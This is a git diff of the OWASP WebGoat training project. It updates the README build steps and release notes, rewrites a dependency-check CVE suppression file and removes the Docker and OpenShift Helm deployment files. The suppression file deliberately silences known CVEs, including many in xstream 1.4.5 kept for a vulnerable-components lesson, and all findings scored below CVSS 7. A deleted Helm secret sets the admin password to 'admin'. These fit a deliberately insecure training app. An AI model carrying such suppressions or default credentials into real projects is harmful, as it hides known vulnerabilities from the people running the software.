@ -56,19 +50,16 @@ WebWolf will be located at: http://localhost:9090/WebWolf
Download the latest WebGoat and WebWolf release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases) Download the latest WebGoat and WebWolf release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
```shell ```shell
java -Dfile.encoding=UTF-8 -jar webgoat-server-8.2.2.jar [--server.port=8080] [--server.address=localhost] [--hsqldb.port=9001] java -Dfile.encoding=UTF-8 -jar webgoat-8.2.3.jar
java -Dfile.encoding=UTF-8 -jar webwolf-8.2.2.jar [--server.port=9090] [--server.address=localhost] [--hsqldb.port=9001]
``` ```
WebGoat will be located at: http://localhost:8080/WebGoat and Click the link in the log to start WebGoat.
WebWolf will be located at: http://localhost:9090/WebWolf (change ports if necessary)
## 3. Run from the sources ## 3. Run from the sources
### Prerequisites: ### Prerequisites:
* Java 17 * Java 17
* Maven > 3.2.1
* Your favorite IDE * Your favorite IDE
* Git, or Git support in your IDE * Git, or Git support in your IDE
@ -83,18 +74,29 @@ Now let's start by compiling the project.
```Shell ```Shell
cd WebGoat cd WebGoat
git checkout <<branch_name>> git checkout <<branch_name>>
mvn clean install # On Linux/Mac:
./mvnw clean install
# On Windows:
./mvnw.cmd clean install
# Using docker or podman, you can than build the container locally
docker build -f Dockerfile . -t webgoat/webgoat
``` ```
Now we are ready to run the project. WebGoat 8.x is using Spring-Boot. Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
```Shell ```Shell
mvn -pl webgoat-server spring-boot:run # On Linux/Mac:
./mvnw spring-boot:run
# On Windows:
./mvnw.cmd spring-boot:run
``` ```
... you should be running webgoat on localhost:8080/WebGoat momentarily ... you should be running WebGoat on localhost:8080/WebGoat momentarily
To change the IP address add the following variable to the WebGoat/webgoat-container/src/main/resources/application.properties file: To change the IP address add the following variable to the `WebGoat/webgoat-container/src/main/resources/application.properties file`:
``` ```
server.address=x.x.x.x server.address=x.x.x.x
@ -108,9 +110,9 @@ For instance running as a jar on a Linux/macOS it will look like this:
```Shell ```Shell
export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE" export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE"
export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations" export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations"
java -jar webgoat-server/target/webgoat-server-v8.2.2-SNAPSHOT.jar java -jar target/webgoat-8.2.3-SNAPSHOT.jar
```
Or in a docker run it would (once this version is pushed into docker hub) look like this: Or in a docker run it would (once this version is pushed into docker hub) look like this:
```Shell ```Shell
docker run -d -p 80:8888 -p 8080:8080 -p 9090:9090 -e TZ=Europe/Amsterdam -e EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE" -e EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations" webgoat/goatandwolf docker run -d -p 8080:8080 -p 9090:9090 -e TZ=Europe/Amsterdam -e EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE" -e EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations" webgoat/webgoat
``` ```

16
RELEASE_NOTES.md
View File

@ -4,7 +4,21 @@
### New functionality ### New functionality
- Update the Docker startup script, it is now possible to pass `skip-nginx` or set `SKIP_NGINX` as environment variable. - New year's resolution: major refactoring of WebGoat to simplify the setup and improve building times.
- Move away from multi-project setup:
- This has a huge performance benefit when building the application. Build time locally is now `Total time: 42.469 s` (depends on your local machine of course)
- No longer add Maven dependencies in several places
- H2 no longer needs to run as separate process, which solves the issue of WebWolf sharing and needing to configure the correct database connection.
- More explicit paths in html files to reference `adoc` files, less magic.
- Integrate WebWolf in WebGoat, the setup was way too complicated and needed configuration which could lead to mistakes and a not working application. This also simplifies the Docker configuration as there is only 1 Docker image.
- Add WebWolf button in WebGoat
- Move all lessons into `src/main/resources`
- WebGoat selects a port dynamically when starting. It will still start of port 8080 it will try another port to ease the user experience.
- WebGoat logs URL after startup: `Please browse to http://127.0.0.1:8080/WebGoat to get started...`
- Simplify `Dockerfile` as we no longer need a script to start everything
- Maven build now start WebGoat jar with Maven plugin to make sure we run against the latest build.
- Added `Initializable` interface for a lesson, an assignment can implement this interface to set it up for a specific user and to reset the assignment back to its original state when a reset lesson occurs. See `BlindSendFileAssignment` for an example.
- Integration tests now use the same user. This saves a lot of time as before every test used a different user which triggered the Flyway migration to set up the database schema for the user. This migration took a lot of time.
## Version 8.2.2 ## Version 8.2.2

95
config/dependency-check/project-suppression.xml
View File

@ -1,42 +1,77 @@
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd"> <suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd">
<suppress base="true"> <suppress>
<notes><![CDATA[ <notes><![CDATA[
This suppresses false positives identified on spring framework. This suppresses all CVE entries that have a score below CVSS 7.
]]></notes> ]]></notes>
<cpe>cpe:/a:pivotal_software:spring_framework</cpe> <cvssBelow>7</cvssBelow>
<cve>CVE-2020-5398</cve>
</suppress> </suppress>
<suppress base="true"> <suppress>
<notes><![CDATA[ <notes><![CDATA[
This suppresses false positives identified on spring framework. file name: spring-tx-5.3.21.jar
]]></notes> ]]></notes>
<cpe>cpe:/a:redhat:undertow</cpe> <sha1>13f4f564024d2f85502c151942307c3ca851a4f7</sha1>
<cve>CVE-2019-14888</cve> <cve>CVE-2016-1000027</cve>
</suppress> </suppress>
<suppress base="true"> <suppress>
<notes><![CDATA[ <notes><![CDATA[
This suppresses false positives identified on spring framework. file name: spring-core-5.3.21.jar
]]></notes> ]]></notes>
<cpe>cpe:/a:pivotal_software:spring_security</cpe> <packageUrl regex="true">^pkg:maven/org\.springframework/spring\-core@.*$</packageUrl>
<cve>CVE-2018-1258</cve> <cve>CVE-2016-1000027</cve>
</suppress> </suppress>
<suppress base="true"> <suppress>
<notes><![CDATA[
file name: spring-aop-5.3.21.jar
]]></notes>
<packageUrl regex="true">^pkg:maven/org\.springframework/spring\-aop@.*$</packageUrl>
<cve>CVE-2016-1000027</cve>
</suppress>
<suppress>
<notes><![CDATA[
file name: spring-boot-starter-security-2.7.1.jar
]]></notes>
<packageUrl regex="true">^pkg:maven/org\.springframework\.boot/spring\-boot\-starter\-security@.*$</packageUrl>
<cve>CVE-2022-22978</cve>
</suppress>
<suppress>
<notes><![CDATA[
file name: jruby-stdlib-9.2.20.1.jar: jopenssl.jar (shaded: rubygems:jruby-openssl:0.11.0)
]]></notes>
<packageUrl regex="true">^pkg:maven/rubygems/jruby\-openssl@.*$</packageUrl>
<cpe>cpe:/a:jruby:jruby</cpe> <cpe>cpe:/a:jruby:jruby</cpe>
<cve>CVE-2018-1000613</cve> <cpe>cpe:/a:openssl:openssl</cpe>
<cve>CVE-2018-1000180</cve> </suppress>
<cve>CVE-2017-18640</cve> <suppress>
<cve>CVE-2011-4838</cve> <notes><![CDATA[
</suppress> file name: xstream-1.4.5.jar
<suppress base="true"><!-- vulnerable components lesson --> ]]></notes>
<packageUrl regex="true">^pkg:maven/com\.thoughtworks\.xstream/xstream@.*$</packageUrl>
<cpe>cpe:/a:xstream_project:xstream</cpe> <cpe>cpe:/a:xstream_project:xstream</cpe>
<cve>CVE-2017-7957</cve> <vulnerabilityName>CVE-2013-7285</vulnerabilityName>
<cve>CVE-2016-3674</cve> <vulnerabilityName>CVE-2016-3674</vulnerabilityName>
<cve>CVE-2020-26217</cve> <vulnerabilityName>CVE-2017-7957</vulnerabilityName>
<cve>CVE-2020-26258</cve> <vulnerabilityName>CVE-2020-26217</vulnerabilityName>
</suppress> <vulnerabilityName>CVE-2020-26258</vulnerabilityName>
<suppress base="true"><!-- webgoat-server --> <vulnerabilityName>CVE-2020-26259</vulnerabilityName>
<cpe>cpe:/a:postgresql:postgresql</cpe> <vulnerabilityName>CVE-2021-21341</vulnerabilityName>
<cve>CVE-2018-10936</cve> <vulnerabilityName>CVE-2021-21342</vulnerabilityName>
</suppress> <vulnerabilityName>CVE-2021-21343</vulnerabilityName>
<vulnerabilityName>CVE-2021-21344</vulnerabilityName>
<vulnerabilityName>CVE-2021-21345</vulnerabilityName>
<vulnerabilityName>CVE-2021-21346</vulnerabilityName>
<vulnerabilityName>CVE-2021-21347</vulnerabilityName>
<vulnerabilityName>CVE-2021-21348</vulnerabilityName>
<vulnerabilityName>CVE-2021-21349</vulnerabilityName>
<vulnerabilityName>CVE-2021-21350</vulnerabilityName>
<vulnerabilityName>CVE-2021-21351</vulnerabilityName>
<vulnerabilityName>CVE-2021-43859</vulnerabilityName>
</suppress>
<suppress>
<notes><![CDATA[
file name: spring-jcl-5.3.21.jar
]]></notes>
<packageUrl regex="true">^pkg:maven/org\.springframework/spring\-.*@.*$</packageUrl>
<cve>CVE-2016-1000027</cve>
</suppress>
</suppressions> </suppressions>

1746
config/pmd/pmd-ruleset.xml
View File

File diff suppressed because it is too large Load Diff

22
docker/Dockerfile
View File

@ -1,22 +0,0 @@
FROM eclipse-temurin:17_35-jdk-focal
RUN apt-get update
RUN useradd -ms /bin/bash webgoat
RUN apt-get -y install apt-utils nginx
RUN chgrp -R 0 /home/webgoat
RUN chmod -R g=u /home/webgoat
USER webgoat
COPY --chown=webgoat nginx.conf /etc/nginx/nginx.conf
COPY --chown=webgoat index.html /usr/share/nginx/html/
COPY --chown=webgoat target/webgoat-server-*.jar /home/webgoat/webgoat.jar
COPY --chown=webgoat target/webwolf-*.jar /home/webgoat/webwolf.jar
COPY --chown=webgoat start.sh /home/webgoat
RUN chmod +x /home/webgoat/start.sh
EXPOSE 8080
EXPOSE 9090
WORKDIR /home/webgoat
ENTRYPOINT ["./start.sh"]

13
docker/Readme.md
View File

@ -1,13 +0,0 @@
# Docker all-in-one image
## Docker build
```shell
docker build --no-cache --build-arg webgoat_version=8.2.0-SNAPSHOT -t webgoat/goatandwolf:latest .
```
## Docker run
```shell
docker run -p 127.0.0.1:80:8888 -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf:latest
```

70
docker/index.html
View File

@ -1,70 +0,0 @@
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
.p1 {
font-family: Arial, Helvetica, sans-serif;
}
.webgoat {
float: left;
margin-right: 250px;
text-align: center;
}
.webwolf {
float: left;
width: 40%;
height: 40%;
text-align: center;
}
#images {
display: flex;
align-items: center;
justify-content: center;
}
body {
text-align: center;
}
</style>
</head>
<body>
<h1>
<center>
Landing page for WebGoat and WebWolf
</center>
</h1>
<blockquote class="p1">
WebGoat is a deliberately insecure web application maintained by <a href="http://www.owasp.org/">OWASP</a> designed
to teach web
application security lessons.
This program is a demonstration of common server-side application flaws. The
exercises are intended to be used by people to learn about application security and
penetration testing techniques.
</blockquote>
<br/>
<p class="p1">Click on one of the images to go to WebGoat or WebWolf</p>
<br/>
<br/>
<div id="images">
<a href="http://127.0.0.1:8080/WebGoat" title="Open WebGoat" target="_blank"><img class="webgoat"
src="http://127.0.0.1:8080/WebGoat/css/img/logoBG.jpg"></a>
<a href="http://127.0.0.1:9090/WebWolf" title="Open WebWolf" target="_blank"><img class="webwolf"
src="http://127.0.0.1:9090/images/wolf.png"></a>
</div>
</body>
</html>

140
docker/nginx.conf
View File

@ -1,140 +0,0 @@
error_log /tmp/error.log;
pid /tmp/nginx.pid;
worker_processes 1;
events { worker_connections 1024; }
http {
client_body_temp_path /tmp/client_body;
fastcgi_temp_path /tmp/fastcgi_temp;
proxy_temp_path /tmp/proxy_temp;
scgi_temp_path /tmp/scgi_temp;
uwsgi_temp_path /tmp/uwsgi_temp;
sendfile on;
upstream docker-webgoat {
server 127.0.0.1:8080;
}
upstream docker-webwolf {
server 127.0.0.1:9090;
}
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Host $server_name;
server {
listen 8888;
server_name www.webgoat.local;
root /var/www;
access_log /tmp/goataccess.log;
error_log /tmp/goaterror.log;
location ~* \.(png|jpg|jpeg|gif|ico|woff|otf|ttf|mvc|svg|txt|pdf|docx?|xlsx?)$ {
access_log off;
proxy_pass http://docker-webgoat;
proxy_redirect off;
}
location / {
root /usr/share/nginx/html;
index index.html;
add_header Cache-Control no-cache;
expires 0;
}
location /WebGoat {
proxy_pass http://docker-webgoat;
proxy_redirect off;
}
}
server {
listen 8888;
server_name www.webwolf.local;
root /var/www;
access_log /tmp/wolfaccess.log;
error_log /tmp/wolferror.log;
location /WebGoat/PasswordReset/ForgotPassword/create-password-reset-link {
proxy_pass http://docker-webgoat;
proxy_redirect off;
}
location /PasswordReset/reset/reset-password {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /files {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /tmpdir {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /webjars {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /css {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /login {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /images {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /mail {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /upload {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /js {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /landing {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /logout {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
location /WebWolf {
proxy_pass http://docker-webwolf;
proxy_redirect off;
}
}
}

40
docker/pom.xml
View File

@ -1,40 +0,0 @@
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<artifactId>webgoat-all-in-one-docker</artifactId>
<packaging>jar</packaging>
<parent>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<version>8.2.3-SNAPSHOT</version>
</parent>
<dependencies>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-antrun-plugin</artifactId>
<version>3.0.0</version>
<executions>
<execution>
<phase>install</phase>
<configuration>
<target>
<copy file="../webgoat-server/target/webgoat-server-${project.version}.jar" tofile="target/webgoat-server-${project.version}.jar"/>
<copy file="../webwolf/target/webwolf-${project.version}.jar" tofile="target/webwolf-${project.version}.jar"/>
</target>
</configuration>
<goals>
<goal>run</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</build>
</project>

2
docs/README.md
View File

@ -1,5 +1,5 @@
# WebGoat landing page # WebGoat landing page
Old Github page which now redirects to OWASP website. Old GitHub page which now redirects to OWASP website.

2
mvn-debug
View File

@ -1,2 +1,2 @@
export MAVEN_OPTS="-Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000" export MAVEN_OPTS="-Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000"
mvn $@ ./mvnw $@

54
platformQuickStarts/helm/Readme.md
View File

@ -1,54 +0,0 @@
# Helm chart deployment on OpenShift K8S clusters
This helm chart can be used on a OpenShift Code Ready Container environment or an OpenShift Cloud Container environment.
With the OpenShift CRC (Code Ready Container) cluster you run an entire environment on your local machine. (> 4 vCPU, >8GB mem)
See the Red Hat documentation for general understanding of OpenShift. Make sure helm is installed as well.
https://developers.redhat.com/developer-sandbox
## CRC commands
crc config set cpus 6
crc config set memory 12288
crc setup
crc start
eval $(crc oc-env)
oc login -u developer https://api.crc.testing:6443
oc new-project demo-project
The example without modification uses *demo-project* as the project/namespace for installing WebGoat and WebWolf.
## Helm install this example on your local Code Ready Container environment
helm install goat1 ./webgoat
## Helm install on single node Developer Sandbox (cloud)
oc login --token=sha256~phDWy6Wm_oJQW6kmOHEbLkRdDIXU6b70hRVmdSYWolM --server=https://api.sandbox-m2.rz9k.p1.openshiftapps.com:6443
helm install --set namespace=renezubcevic-dev --set accessMode=ReadWriteOnce --set urlpostfix=.apps.sandbox-m2.rz9k.p1.openshiftapps.com goat1 ./webgoat
A code ready container looks the same for all developers on their local machine, but a developer sandbox requires other credentials from your account in the cloud and different namespace and urlpostfix and also a different access mode for the persistent storage.
Of course the token here is a fake.
## uninstall
helm uninstall goat1
The URL on a Code Ready Container is build from router name + namespace + default extension .apps-crc.testing:
+ [https://webgoat-1-goat-demo-project.apps-crc.testing/WebGoat](https://webgoat-1-goat-demo-project.apps-crc.testing/WebGoat)
+ [http://webwolf-1-wolf-demo-project.apps-crc.testing/WebWolf](http://webwolf-1-wolf-demo-project.apps-crc.testing/WebWolf)
## Explanation
deployment.yaml contains two K8S deployment elements. Both use the same Persistent Volume Claim and use the same Volume mapping.
They both use the same image but with other entrypoint and command arguments. The java.io.dir is also mapped to this persistent volume mapping. The number of pods is 1 for both WebGoat and WebWolf. WebGoat uses the WEBWOLF_HOST parameter to know where the external address of WebWolf is defined. WebWolf uses WEBGOAT_HOST to define the internal service address to WebGoat for connecting to the HSQL database
persistent-storage-claim.yaml contains the OpenShift K8S extension for requestig a volume with Read-Write access that will survive any pod replacements.
service.yaml defines the service ports for both WebGoat and WebWolf
route-goat defines an https endpoint toward the 8080 port. route-wolf defines an http port towards the 9090 port.

23
platformQuickStarts/helm/modsec/.helmignore
View File

@ -1,23 +0,0 @@
# Patterns to ignore when building packages.
# This supports shell glob matching, relative path matching, and
# negation (prefixed with !). Only one pattern per line.
.DS_Store
# Common VCS dirs
.git/
.gitignore
.bzr/
.bzrignore
.hg/
.hgignore
.svn/
# Common backup files
*.swp
*.bak
*.tmp
*.orig
*~
# Various IDEs
.project
.idea/
*.tmproj
.vscode/

9
platformQuickStarts/helm/modsec/Chart.yaml
View File

@ -1,9 +0,0 @@
apiVersion: v2
name: modsec
description: ModSecurity Core Rule Set
type: application
version: 0.1.0
appVersion: "latest"

18
platformQuickStarts/helm/modsec/templates/configmap-modsec.yaml
View File

@ -1,18 +0,0 @@
kind: ConfigMap
apiVersion: v1
metadata:
name: {{ .Values.modsec_server.name }}-configmap-modsec
namespace: {{ .Values.namespace }}
labels:
app.kubernetes.io/part-of: {{ .Values.modsec_server.name }}
data:
PARANOIA: '1'
EXECUTING_PARANOIA: '2'
ANOMALYIN: '5'
ANOMALYOUT: '5'
ALLOWED_METHODS: 'GET POST'
ALLOWED_REQUEST_CONTENT_TYPE: "text/xml|application/xml|text/plain"
MAX_FILE_SIZE: '5242880'
PORT: '8001'
RESTRICTED_EXTENSIONS: '.conf/'
BACKEND: 'http://{{ .Values.webgoat_server.name }}-service:8080'

45
platformQuickStarts/helm/modsec/templates/deployment.yaml
View File

@ -1,45 +0,0 @@
kind: Deployment
apiVersion: apps/v1
metadata:
name: {{ .Values.modsec_server.name }}
namespace: {{ .Values.namespace }}
spec:
replicas: 1
selector:
matchLabels:
app: {{ .Values.modsec_server.name }}
template:
metadata:
labels:
app: {{ .Values.modsec_server.name }}
spec:
containers:
- resources:
limits:
memory: "2Gi"
cpu: "1"
requests:
memory: "1Gi"
cpu: "0.5"
name: modsec
ports:
- containerPort: 8001
protocol: TCP
image: {{ .Values.modsec_server.image }}
imagePullPolicy: Always
terminationMessagePolicy: File
envFrom:
- configMapRef:
name: {{ .Values.modsec_server.name }}-configmap-modsec
restartPolicy: Always
terminationGracePeriodSeconds: 30
dnsPolicy: ClusterFirst
securityContext: {}
schedulerName: default-scheduler
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 25%
maxSurge: 25%
revisionHistoryLimit: 10
progressDeadlineSeconds: 600

16
platformQuickStarts/helm/modsec/templates/route-modsec.yml
View File

@ -1,16 +0,0 @@
apiVersion: route.openshift.io/v1
kind: Route
metadata:
labels:
app: {{ .Values.modsec_server.name }}
name: {{ .Values.modsec_server.name }}-modsec
namespace: {{ .Values.namespace }}
spec:
path: /
port:
targetPort: 8001
to:
kind: Service
name: {{ .Values.modsec_server.name }}-service
weight: 100
wildcardPolicy: None

16
platformQuickStarts/helm/modsec/templates/service.yaml
View File

@ -1,16 +0,0 @@
apiVersion: v1
kind: Service
metadata:
labels:
app: {{ .Values.modsec_server.name }}
name: {{ .Values.modsec_server.name }}-service
namespace: {{ .Values.namespace }}
spec:
ports:
- name: 8001-tcp
port: 8001
protocol: TCP
targetPort: 8001
selector:
app: {{ .Values.modsec_server.name }}
sessionAffinity: None

13
platformQuickStarts/helm/modsec/values.yaml
View File

@ -1,13 +0,0 @@
namespace: demo-project
urlpostfix: .apps-crc.testing
accessMode: ReadWriteMany
modsec_server:
name: modsec-1
#image: docker.io/franbuehler/modsecurity-crs-rp
#image: docker.io/owasp/modsecurity-crs
image: docker.io/chrira/modsecurity-crs-rp:openshift
webgoat_server:
name: webgoat-1

23
platformQuickStarts/helm/webgoat/.helmignore
View File

@ -1,23 +0,0 @@
# Patterns to ignore when building packages.
# This supports shell glob matching, relative path matching, and
# negation (prefixed with !). Only one pattern per line.
.DS_Store
# Common VCS dirs
.git/
.gitignore
.bzr/
.bzrignore
.hg/
.hgignore
.svn/
# Common backup files
*.swp
*.bak
*.tmp
*.orig
*~
# Various IDEs
.project
.idea/
*.tmproj
.vscode/

9
platformQuickStarts/helm/webgoat/Chart.yaml
View File

@ -1,9 +0,0 @@
apiVersion: v2
name: webgoat
description: WebGoat Learning Environment
type: application
version: 0.1.0
appVersion: "8.2.3-SNAPSHOT"

11
platformQuickStarts/helm/webgoat/templates/configmap-wolf.yaml
View File

@ -1,11 +0,0 @@
kind: ConfigMap
apiVersion: v1
metadata:
name: {{ .Values.webwolf_server.name }}-configmap
namespace: {{ .Values.namespace }}
labels:
app.kubernetes.io/part-of: {{ .Values.webgoat_server.name }}
data:
TZ: 'Europe/Amsterdam'
WEBGOAT_HOST: {{ .Values.webgoat_server.name }}-service

13
platformQuickStarts/helm/webgoat/templates/configmap.yaml
View File

@ -1,13 +0,0 @@
kind: ConfigMap
apiVersion: v1
metadata:
name: {{ .Values.webgoat_server.name }}-configmap
namespace: {{ .Values.namespace }}
labels:
app.kubernetes.io/part-of: {{ .Values.webgoat_server.name }}
data:
TZ: 'Europe/Amsterdam'
EXCLUDE_CATEGORIES: 'CLIENT_SIDE'
EXCLUDE_LESSONS: 'SqlInjectionAdvanced'
WEBWOLF_HOST: '{{ .Values.webwolf_server.name }}-wolf-{{ .Values.namespace }}{{ .Values.urlpostfix }}'
WEBWOLF_PORT: '80'

159
platformQuickStarts/helm/webgoat/templates/deployment.yaml
View File

@ -1,159 +0,0 @@
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
app.kubernetes.io/part-of: {{ .Values.webgoat_server.name }}
name: {{ .Values.webgoat_server.name }}
namespace: {{ .Values.namespace }}
spec:
replicas: 1
selector:
matchLabels:
app: {{ .Values.webgoat_server.name }}
template:
metadata:
labels:
app: {{ .Values.webgoat_server.name }}
spec:
volumes:
- name: webgoat-volume-1
persistentVolumeClaim:
claimName: {{ .Values.webgoat_server.name }}-pvc
containers:
- resources:
limits:
memory: "2Gi"
cpu: "1"
requests:
memory: "1Gi"
cpu: "0.5"
name: webgoat
ports:
- containerPort: 8080
protocol: TCP
#livenessProbe:
# failureThreshold: 3
# periodSeconds: 10
# httpGet:
# path: /WebGoat
# port: 8080
#readinessProbe:
# failureThreshold: 3
# periodSeconds: 10
# initialDelaySeconds: 60
## httpGet:
# path: /WebGoat
# port: 8080
image: {{ .Values.webgoat_server.image }}
command:
- 'java'
args: ["-Duser.home=/home/webgoat",
"--add-opens","java.base/java.lang=ALL-UNNAMED",
"--add-opens","java.base/java.util=ALL-UNNAMED",
"--add-opens","java.base/java.lang.reflect=ALL-UNNAMED",
"--add-opens","java.base/java.text=ALL-UNNAMED",
"--add-opens","java.desktop/java.beans=ALL-UNNAMED",
"--add-opens","java.desktop/java.awt.font=ALL-UNNAMED",
"--add-opens","java.base/sun.nio.ch=ALL-UNNAMED",
"--add-opens","java.base/java.io=ALL-UNNAMED",
"-Djava.io.tmpdir=/home/webgoat/.webgoat-{{ .Chart.AppVersion }}",
"-Dfile.encoding=UTF-8",
"-jar","/home/webgoat/webgoat.jar",
"--server.address=0.0.0.0"]
imagePullPolicy: Always
volumeMounts:
- name: webgoat-volume-1
mountPath: /home/webgoat/.webgoat-{{ .Chart.AppVersion }}
terminationMessagePolicy: File
envFrom:
- configMapRef:
name: {{ .Values.webgoat_server.name }}-configmap
- secretRef:
name: {{ .Values.webgoat_server.name }}-secret
restartPolicy: Always
terminationGracePeriodSeconds: 30
dnsPolicy: ClusterFirst
securityContext: {}
schedulerName: default-scheduler
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 25%
maxSurge: 25%
revisionHistoryLimit: 10
progressDeadlineSeconds: 600
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
app.kubernetes.io/part-of: {{ .Values.webgoat_server.name }}
name: {{ .Values.webwolf_server.name }}
namespace: {{ .Values.namespace }}
spec:
replicas: 1
selector:
matchLabels:
app: {{ .Values.webwolf_server.name }}
template:
metadata:
labels:
app: {{ .Values.webwolf_server.name }}
spec:
volumes:
- name: webgoat-volume-1
persistentVolumeClaim:
claimName: {{ .Values.webgoat_server.name }}-pvc
containers:
- resources:
limits:
memory: "2Gi"
cpu: "1"
requests:
memory: "1Gi"
cpu: "0.5"
name: webwolf
ports:
- containerPort: 9090
protocol: TCP
#livenessProbe:
# failureThreshold: 3
# periodSeconds: 10
# httpGet:
# path: /WebWolf
# port: 9090
#readinessProbe:
#failureThreshold: 3
#periodSeconds: 10
#initialDelaySeconds: 100
#httpGet:
# path: /WebWolf
# port: 9090
image: {{ .Values.webwolf_server.image }}
command:
- 'java'
args: ["-Duser.home=/home/webgoat",
"-Djava.io.tmpdir=/home/webgoat/.webgoat-{{ .Chart.AppVersion }}",
"-Dfile.encoding=UTF-8",
"-jar","/home/webgoat/webwolf.jar",
"--server.address=0.0.0.0"]
imagePullPolicy: Always
volumeMounts:
- name: webgoat-volume-1
mountPath: /home/webgoat/.webgoat-{{ .Chart.AppVersion }}
terminationMessagePolicy: File
envFrom:
- configMapRef:
name: {{ .Values.webwolf_server.name }}-configmap
restartPolicy: Always
terminationGracePeriodSeconds: 30
dnsPolicy: ClusterFirst
securityContext: {}
schedulerName: default-scheduler
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 25%
maxSurge: 25%
revisionHistoryLimit: 10
progressDeadlineSeconds: 600

13
platformQuickStarts/helm/webgoat/templates/persistent-storage-claim
View File

@ -1,13 +0,0 @@
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: '{{ .Values.webgoat_server.name }}-pvc'
namespace: '{{ .Values.namespace }}'
spec:
accessModes:
- '{{ .Values.accessMode }}'
resources:
requests:
storage: 1Gi
#volumeName: pv0028
volumeMode: Filesystem

19
platformQuickStarts/helm/webgoat/templates/route-goat.yml
View File

@ -1,19 +0,0 @@
apiVersion: route.openshift.io/v1
kind: Route
metadata:
labels:
app: {{ .Values.webgoat_server.name }}
name: {{ .Values.webgoat_server.name }}-goat
namespace: {{ .Values.namespace }}
spec:
tls:
termination: edge
insecureEdgeTerminationPolicy: Redirect
path: /WebGoat
port:
targetPort: 8080
to:
kind: Service
name: {{ .Values.webgoat_server.name }}-service
weight: 100
wildcardPolicy: None

16
platformQuickStarts/helm/webgoat/templates/route-wolf.yml
View File

@ -1,16 +0,0 @@
apiVersion: route.openshift.io/v1
kind: Route
metadata:
labels:
app: {{ .Values.webwolf_server.name }}
name: {{ .Values.webwolf_server.name }}-wolf
namespace: {{ .Values.namespace }}
spec:
path: /
port:
targetPort: 9090
to:
kind: Service
name: {{ .Values.webwolf_server.name }}-service
weight: 100
wildcardPolicy: None

7
platformQuickStarts/helm/webgoat/templates/secrets.yaml
View File

@ -1,7 +0,0 @@
apiVersion: v1
kind: Secret
metadata:
name: {{ .Values.webgoat_server.name }}-secret
namespace: {{ .Values.namespace }}
stringData:
ADMIN_PASSWORD: admin

39
platformQuickStarts/helm/webgoat/templates/service.yaml
View File

@ -1,39 +0,0 @@
apiVersion: v1
kind: Service
metadata:
labels:
app: {{ .Values.webgoat_server.name }}
app.kubernetes.io/part-of: {{ .Values.webgoat_server.name }}
name: {{ .Values.webgoat_server.name }}-service
namespace: {{ .Values.namespace }}
spec:
ports:
- name: 8080-tcp
port: 8080
protocol: TCP
targetPort: 8080
- name: 9001-tcp
port: 9001
protocol: TCP
targetPort: 9001
selector:
app: {{ .Values.webgoat_server.name }}
sessionAffinity: None
---
apiVersion: v1
kind: Service
metadata:
labels:
app: {{ .Values.webwolf_server.name }}
app.kubernetes.io/part-of: {{ .Values.webgoat_server.name }}
name: {{ .Values.webwolf_server.name }}-service
namespace: {{ .Values.namespace }}
spec:
ports:
- name: 9090-tcp
port: 9090
protocol: TCP
targetPort: 9090
selector:
app: {{ .Values.webwolf_server.name }}
sessionAffinity: None

14
platformQuickStarts/helm/webgoat/values.yaml
View File

@ -1,14 +0,0 @@
namespace: demo-project
urlpostfix: .apps-crc.testing
accessMode: ReadWriteMany
webgoat_server:
name: webgoat-1
image: docker.io/webgoat/goatandwolf:openshift
webwolf_server:
name: webwolf-1
image: docker.io/webgoat/goatandwolf:openshift

611
pom.xml
View File

@ -4,33 +4,30 @@
